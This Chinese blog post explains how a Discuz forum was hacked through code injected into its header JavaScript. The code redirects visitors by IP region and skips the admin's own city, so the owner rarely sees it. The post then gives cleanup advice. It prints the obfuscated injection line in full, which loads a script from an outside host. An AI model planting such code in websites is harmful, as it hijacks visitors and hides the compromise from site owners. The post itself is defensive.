域名預訂/競價，好“米”不錯過

你是否遇到過你的網站打開一會就自動跳轉到其他頁面，而且這個問題是你的用戶告訴你的，而你自己卻沒有遇到?

discuz掛馬彈出頁面

經過蔥子我細心的對掛馬網站做排查，終于讓我找到了問題所在。

掛馬者是通過在discuz的頭部js文件里面添加了劫持js代碼，通過判斷訪問者的IP來實現不同跳轉的。

具體代碼如下：

document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'><\/s"+"cript>");

可以看出，后面有個“chengdu”代碼，這段代碼的意思就是IP為成都地區(qū)的訪問者在訪問被掛馬頁面時不做跳轉。其余地區(qū)的IP訪問者則跳轉。

從這段代碼我們就可以看出掛馬者是多么的用心險惡。

他首先根據你網站所在地進行判斷網站管理員經常使用的IP地址所在地，然后有針對性的對網站管理員不做跳轉劫持。

所以，這種劫持的情況下，網站管理者非常難以發(fā)現到網站被掛馬了。

解決辦法也比較簡單：

首先校驗下原始文件，對比下哪些js文件近期有被改動過，然后針對被改動過的js文件做以上代碼段的排除。找到以上代碼段后，刪除即可。

最后說一下，各位網站管理者一定要注意保管好網站和服務器的管理密碼，盡量設置的復雜一點。同時也要及時檢測服務器是否存在漏洞等，及時做針對性處理，以避免類似的事情再發(fā)生。

以上文章為向上的蔥子(QQ:2190906550)原創(chuàng)，轉載請注明出處。

原文地址：

申請創(chuàng)業(yè)報道，分享創(chuàng)業(yè)好點子。點擊此處，共同探討創(chuàng)業(yè)新機遇！